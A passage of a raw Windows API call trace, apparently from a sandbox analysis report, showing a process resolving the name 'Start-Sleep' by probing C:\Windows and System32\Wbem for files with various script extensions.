lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x1a [0176.403] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0176.403] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.403] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.404] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.VBE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.405] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.405] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.405] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.JS", lpFilePart=0x0) returned 0x19 [0176.405] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0176.405] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.405] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.406] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.JS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.406] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.406] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.407] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x1a [0176.407] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0176.407] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.407] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.408] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.JSE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.408] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.408] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.409] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x1a [0176.409] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0176.409] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.409] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.410] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.WSF", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.410] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.410] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.410] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x1a [0176.410] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0176.411] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.411] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.411] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.WSH", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.412] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.412] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.412] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x1a [0176.412] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0176.412] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.412] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.413] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.MSC", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.413] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.414] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.414] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x1a [0176.414] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0176.414] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.414] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.415] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.CPL", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.416] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.416] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.416] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep", lpFilePart=0x0) returned 0x16 [0176.417] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0176.417] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.417] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.418] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.418] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x28 [0176.419] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0176.419] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.419] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.420] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.420] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x29 [0176.420] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0176.421] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.421] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.422] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", lpFindFileData=0x1b7de420 | out: 